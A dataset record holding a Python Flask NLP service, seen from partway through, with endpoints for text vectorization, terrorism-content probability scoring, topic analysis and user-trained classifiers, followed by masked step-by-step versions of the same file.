responses=jsonify("Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
#Preprocess the text
print("Sento analysis")
# Probability
probability = probability_terror(text,lang,cls)
print(probability)
# Analyze
filename = os.path.join(os.path.dirname(__file__), 'models-registry.json')
registry = load_data(filename)
analysis = analyze(text, lang, registry)
data_audit={"auditEventType":"Start task","details":{"sento":"NLP analysis"},"principal":"Analyst"}
datajson=json.dumps(data_audit)
results_audit=audit(datajson)
#Send the response codes
responses = jsonify(probability=probability,concepts=analysis[0],key_ideas=analysis[1],topics=analysis[2])
responses.status_code = 200
return responses
@app.route('/classifier',methods=['POST'])
def make_classifier():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request("There is no data for the training"))
else:
#Get the text and the language
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
annotated_data = data['annotated_data']
except:
responses=jsonify("Error in classifier: annotated data is missing")
return responses
try:
user_id=data['user_id']
except:
responses=jsonify("Error in classifier: user_id is missing")
return responses
try:
case_id=data['case_id']
except:
responses=jsonify("Error in classifier: case_id is missing")
return responses
try:
clas_name=data['clas_name']
except:
responses=jsonify("Error in classifier: classifier name is missing")
return responses
print(len(annotated_data))
if len(annotated_data) < 22:
responses=jsonify( "Training data set should have more than 10 samples per each class")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify("Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
#Train the new classifier
print("Training a new classifier from the user's annotated dataset ")
accuracy=classifier(annotated_data,lang,user_id,case_id,clas_name)
data_audit={"auditEventType":"Start task","details":{"classifier":"Trains a new classifier based on the annotations provided by the user"},"principal":"Analyst"}
datajson=json.dumps(data_audit)
results_audit=audit(datajson)
#Send the response codes
responses = jsonify(message="Classifier has been saved. Accuracy given in % - calculated using C-10V", accuracy=accuracy)
responses.status_code = 200
return responses
@app.route('/claslisting',methods=['POST'])
def make_claslisting():
user_id=None
case_id=None
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
try:
user_id=data['user_id']
except:
responses=jsonify(message="Error in classifiers listing: user_id is missing")
return responses
try:
case_id=data['case_id']
except:
responses=jsonify(message="Error in classifiers listing: case_id is missing")
return responses
available_classifiers=claslisting(user_id,case_id)
data_audit={"auditEventType":"Start task","details":{"claslisting":"Lists the available classifiers"},"principal":"Analyst"}
datajson=json.dumps(data_audit)
results_audit=audit(datajson)
#Send the response codes
responses = jsonify(available_classifiers=available_classifiers)
responses.status_code = 200
return responses
@app.route('/my400')
def bad_request(msg=''):
code = 400
if msg=='':
msg = 'Error'
return msg, code
if __name__ == '__main__':
#app.run()
app.run(host='0.0.0.0',port=5000)
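# A hedged client-side sketch exercising the /vectorize endpoint, assuming the Flask
# service above is running locally on port 5000 and the embedding files named in
# emb_dict are available to the server; the sample text is purely illustrative.
import requests

resp = requests.post(
    "http://localhost:5000/vectorize",
    json={"text": "sample text to embed", "lang": "en"},
)
body = resp.json()
if isinstance(body, dict) and "vector" in body:
    print(len(body["vector"]))   # dimensionality of the mean embedding (300)
else:
    print(body)                  # error message returned by the endpoint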
|
normal
|
{
"blob_id": "b51e0ee80a2488197470627821204d1f74cd62a1",
"index": 5437,
"step-1": "<mask token>\n\n\[email protected]('/probability', methods=['POST'])\ndef make_probability():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in probability: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in probability: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Computing probability of having content related to ' + cls)\n probability = probability_terror(text, lang, cls)\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze', methods=['POST'])\ndef make_analyze():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in analyze: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(message=\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n responses = jsonify(concepts=analysis[0], key_ideas=analysis[1],\n topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms', methods=['POST'])\ndef make_terms():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n texts = data['dataset']\n print('Suggesting new terms for search...')\n terms = new_terms(texts)\n responses = jsonify(message='Suggested new terms for search: ',\n terms=list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento', methods=['POST'])\ndef make_sento():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in sento: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in sento: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. 
Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Sento analysis')\n probability = probability_terror(text, lang, cls)\n print(probability)\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n data_audit = {'auditEventType': 'Start task', 'details': {'sento':\n 'NLP analysis'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(probability=probability, concepts=analysis[0],\n key_ideas=analysis[1], topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/classifier', methods=['POST'])\ndef make_classifier():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request('There is no data for the training')\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses = jsonify(\n 'Error in classifier: annotated data is missing')\n return responses\n try:\n user_id = data['user_id']\n except:\n responses = jsonify('Error in classifier: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify('Error in classifier: case_id is missing')\n return responses\n try:\n clas_name = data['clas_name']\n except:\n responses = jsonify(\n 'Error in classifier: classifier name is missing')\n return responses\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses = jsonify(\n 'Training data set should have more than 10 samples per each class'\n )\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print(\"Training a new classifier from the user's annotated dataset \")\n accuracy = classifier(annotated_data, lang, user_id, case_id, clas_name\n )\n data_audit = {'auditEventType': 'Start task', 'details': {\n 'classifier':\n 'Trains a new classifier based on the annotations provided by the user'\n }, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(message=\n 'Classifier has been saved. 
Accuracy given in % - calculated using C-10V'\n , accuracy=accuracy)\n responses.status_code = 200\n return responses\n\n\[email protected]('/claslisting', methods=['POST'])\ndef make_claslisting():\n user_id = None\n case_id = None\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n user_id = data['user_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: case_id is missing')\n return responses\n available_classifiers = claslisting(user_id, case_id)\n data_audit = {'auditEventType': 'Start task', 'details': {'claslisting':\n 'Lists the available classifiers'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n\n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg == '':\n msg = 'Error'\n return msg, code\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/vectorize', methods=['POST'])\ndef make_vectorize():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in vectorize: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Vectorize...')\n embeddings = Embeddings(emb_dict[lang])\n processed_text = preprocess(text)\n no_stpw_text = remove_stopwords(processed_text, lang)\n vectorized_tokens = to_vector_single_nonzeros(no_stpw_text,\n embeddings, len(no_stpw_text))\n if len(vectorized_tokens) > 0:\n vectorized_text = np.mean(vectorized_tokens, axis=0)\n else:\n vectorized_text = np.zeros((300,) * 1)\n print(vectorized_text)\n responses = jsonify(vector=vectorized_text.tolist())\n responses.status_code = 200\n return responses\n\n\[email protected]('/probability', methods=['POST'])\ndef make_probability():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in probability: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in probability: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Computing probability of having content related to ' + cls)\n probability = probability_terror(text, lang, cls)\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze', methods=['POST'])\ndef make_analyze():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in analyze: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(message=\n \"Language not available. 
Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n responses = jsonify(concepts=analysis[0], key_ideas=analysis[1],\n topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms', methods=['POST'])\ndef make_terms():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n texts = data['dataset']\n print('Suggesting new terms for search...')\n terms = new_terms(texts)\n responses = jsonify(message='Suggested new terms for search: ',\n terms=list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento', methods=['POST'])\ndef make_sento():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in sento: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in sento: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Sento analysis')\n probability = probability_terror(text, lang, cls)\n print(probability)\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n data_audit = {'auditEventType': 'Start task', 'details': {'sento':\n 'NLP analysis'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(probability=probability, concepts=analysis[0],\n key_ideas=analysis[1], topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/classifier', methods=['POST'])\ndef make_classifier():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request('There is no data for the training')\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses = jsonify(\n 'Error in classifier: annotated data is missing')\n return responses\n try:\n user_id = data['user_id']\n except:\n responses = jsonify('Error in classifier: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify('Error in classifier: case_id is missing')\n return responses\n try:\n clas_name = data['clas_name']\n except:\n responses = jsonify(\n 'Error in classifier: classifier name is missing')\n return responses\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses = jsonify(\n 'Training data set should have more than 10 samples per each class'\n )\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. 
Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print(\"Training a new classifier from the user's annotated dataset \")\n accuracy = classifier(annotated_data, lang, user_id, case_id, clas_name\n )\n data_audit = {'auditEventType': 'Start task', 'details': {\n 'classifier':\n 'Trains a new classifier based on the annotations provided by the user'\n }, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(message=\n 'Classifier has been saved. Accuracy given in % - calculated using C-10V'\n , accuracy=accuracy)\n responses.status_code = 200\n return responses\n\n\[email protected]('/claslisting', methods=['POST'])\ndef make_claslisting():\n user_id = None\n case_id = None\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n user_id = data['user_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: case_id is missing')\n return responses\n available_classifiers = claslisting(user_id, case_id)\n data_audit = {'auditEventType': 'Start task', 'details': {'claslisting':\n 'Lists the available classifiers'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n\n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg == '':\n msg = 'Error'\n return msg, code\n\n\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\nemb_dict = {'en': 'embedding-EN', 'ar': 'embedding-AR', 'es':\n 'embedding-ES', 'ro': 'embedding-RO', 'fr': 'embedding-FR'}\n\n\[email protected]('/vectorize', methods=['POST'])\ndef make_vectorize():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in vectorize: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Vectorize...')\n embeddings = Embeddings(emb_dict[lang])\n processed_text = preprocess(text)\n no_stpw_text = remove_stopwords(processed_text, lang)\n vectorized_tokens = to_vector_single_nonzeros(no_stpw_text,\n embeddings, len(no_stpw_text))\n if len(vectorized_tokens) > 0:\n vectorized_text = np.mean(vectorized_tokens, axis=0)\n else:\n vectorized_text = np.zeros((300,) * 1)\n print(vectorized_text)\n responses = jsonify(vector=vectorized_text.tolist())\n responses.status_code = 200\n return responses\n\n\[email protected]('/probability', methods=['POST'])\ndef make_probability():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in probability: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in probability: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Computing probability of having content related to ' + cls)\n probability = probability_terror(text, lang, cls)\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze', methods=['POST'])\ndef make_analyze():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in analyze: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(message=\n \"Language not available. 
Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n responses = jsonify(concepts=analysis[0], key_ideas=analysis[1],\n topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms', methods=['POST'])\ndef make_terms():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n texts = data['dataset']\n print('Suggesting new terms for search...')\n terms = new_terms(texts)\n responses = jsonify(message='Suggested new terms for search: ',\n terms=list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento', methods=['POST'])\ndef make_sento():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in sento: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in sento: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Sento analysis')\n probability = probability_terror(text, lang, cls)\n print(probability)\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n data_audit = {'auditEventType': 'Start task', 'details': {'sento':\n 'NLP analysis'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(probability=probability, concepts=analysis[0],\n key_ideas=analysis[1], topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/classifier', methods=['POST'])\ndef make_classifier():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request('There is no data for the training')\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses = jsonify(\n 'Error in classifier: annotated data is missing')\n return responses\n try:\n user_id = data['user_id']\n except:\n responses = jsonify('Error in classifier: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify('Error in classifier: case_id is missing')\n return responses\n try:\n clas_name = data['clas_name']\n except:\n responses = jsonify(\n 'Error in classifier: classifier name is missing')\n return responses\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses = jsonify(\n 'Training data set should have more than 10 samples per each class'\n )\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. 
Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print(\"Training a new classifier from the user's annotated dataset \")\n accuracy = classifier(annotated_data, lang, user_id, case_id, clas_name\n )\n data_audit = {'auditEventType': 'Start task', 'details': {\n 'classifier':\n 'Trains a new classifier based on the annotations provided by the user'\n }, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(message=\n 'Classifier has been saved. Accuracy given in % - calculated using C-10V'\n , accuracy=accuracy)\n responses.status_code = 200\n return responses\n\n\[email protected]('/claslisting', methods=['POST'])\ndef make_claslisting():\n user_id = None\n case_id = None\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n user_id = data['user_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: case_id is missing')\n return responses\n available_classifiers = claslisting(user_id, case_id)\n data_audit = {'auditEventType': 'Start task', 'details': {'claslisting':\n 'Lists the available classifiers'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n\n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg == '':\n msg = 'Error'\n return msg, code\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n",
"step-4": "import pandas as pd\nimport pickle\nfrom flask import Flask, render_template, request, jsonify\nfrom utilities import load_data, detect_language\nfrom preprocessing import preprocess, Tagger, remove_stopwords\nimport json\nfrom gensim.models import KeyedVectors\nfrom Embeddings import Embeddings, to_vector_single, to_vector_single_nonzeros\nimport numpy as np\nimport os\nfrom analysis import analyze\nfrom probability_terror import probability_terror\nfrom new_terms_no_lang import new_terms\nfrom classifier import classifier\nfrom claslisting import claslisting\nfrom audit import audit\napp = Flask(__name__)\nemb_dict = {'en': 'embedding-EN', 'ar': 'embedding-AR', 'es':\n 'embedding-ES', 'ro': 'embedding-RO', 'fr': 'embedding-FR'}\n\n\[email protected]('/vectorize', methods=['POST'])\ndef make_vectorize():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in vectorize: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Vectorize...')\n embeddings = Embeddings(emb_dict[lang])\n processed_text = preprocess(text)\n no_stpw_text = remove_stopwords(processed_text, lang)\n vectorized_tokens = to_vector_single_nonzeros(no_stpw_text,\n embeddings, len(no_stpw_text))\n if len(vectorized_tokens) > 0:\n vectorized_text = np.mean(vectorized_tokens, axis=0)\n else:\n vectorized_text = np.zeros((300,) * 1)\n print(vectorized_text)\n responses = jsonify(vector=vectorized_text.tolist())\n responses.status_code = 200\n return responses\n\n\[email protected]('/probability', methods=['POST'])\ndef make_probability():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in probability: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in probability: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. 
Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Computing probability of having content related to ' + cls)\n probability = probability_terror(text, lang, cls)\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze', methods=['POST'])\ndef make_analyze():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in analyze: text is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(message=\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n responses = jsonify(concepts=analysis[0], key_ideas=analysis[1],\n topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms', methods=['POST'])\ndef make_terms():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n texts = data['dataset']\n print('Suggesting new terms for search...')\n terms = new_terms(texts)\n responses = jsonify(message='Suggested new terms for search: ',\n terms=list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento', methods=['POST'])\ndef make_sento():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n text = data['text']\n except:\n responses = jsonify('Error in sento: text is missing')\n return responses\n try:\n cls = data['classifier']\n except:\n responses = jsonify('Error in sento: classifier is missing')\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. 
Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print('Sento analysis')\n probability = probability_terror(text, lang, cls)\n print(probability)\n filename = os.path.join(os.path.dirname(__file__),\n 'models-registry.json')\n registry = load_data(filename)\n analysis = analyze(text, lang, registry)\n data_audit = {'auditEventType': 'Start task', 'details': {'sento':\n 'NLP analysis'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(probability=probability, concepts=analysis[0],\n key_ideas=analysis[1], topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/classifier', methods=['POST'])\ndef make_classifier():\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request('There is no data for the training')\n else:\n try:\n lang = data['lang']\n except:\n try:\n lang = detect_language(data['text'])\n print(lang)\n except:\n responses = jsonify(\n 'Error in vectorize: language field is missing')\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses = jsonify(\n 'Error in classifier: annotated data is missing')\n return responses\n try:\n user_id = data['user_id']\n except:\n responses = jsonify('Error in classifier: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify('Error in classifier: case_id is missing')\n return responses\n try:\n clas_name = data['clas_name']\n except:\n responses = jsonify(\n 'Error in classifier: classifier name is missing')\n return responses\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses = jsonify(\n 'Training data set should have more than 10 samples per each class'\n )\n return responses\n if lang not in ['en', 'es', 'ar', 'ro', 'fr']:\n responses = jsonify(\n \"Language not available. Language must be in ['en','es','ar','ro','fr']\"\n )\n return responses\n print(\"Training a new classifier from the user's annotated dataset \")\n accuracy = classifier(annotated_data, lang, user_id, case_id, clas_name\n )\n data_audit = {'auditEventType': 'Start task', 'details': {\n 'classifier':\n 'Trains a new classifier based on the annotations provided by the user'\n }, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(message=\n 'Classifier has been saved. 
Accuracy given in % - calculated using C-10V'\n , accuracy=accuracy)\n responses.status_code = 200\n return responses\n\n\[email protected]('/claslisting', methods=['POST'])\ndef make_claslisting():\n user_id = None\n case_id = None\n try:\n data = request.get_json()\n except Exception as e:\n raise e\n if data == {}:\n return bad_request()\n else:\n try:\n user_id = data['user_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: user_id is missing')\n return responses\n try:\n case_id = data['case_id']\n except:\n responses = jsonify(message=\n 'Error in classifiers listing: case_id is missing')\n return responses\n available_classifiers = claslisting(user_id, case_id)\n data_audit = {'auditEventType': 'Start task', 'details': {'claslisting':\n 'Lists the available classifiers'}, 'principal': 'Analyst'}\n datajson = json.dumps(data_audit)\n results_audit = audit(datajson)\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n\n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg == '':\n msg = 'Error'\n return msg, code\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n",
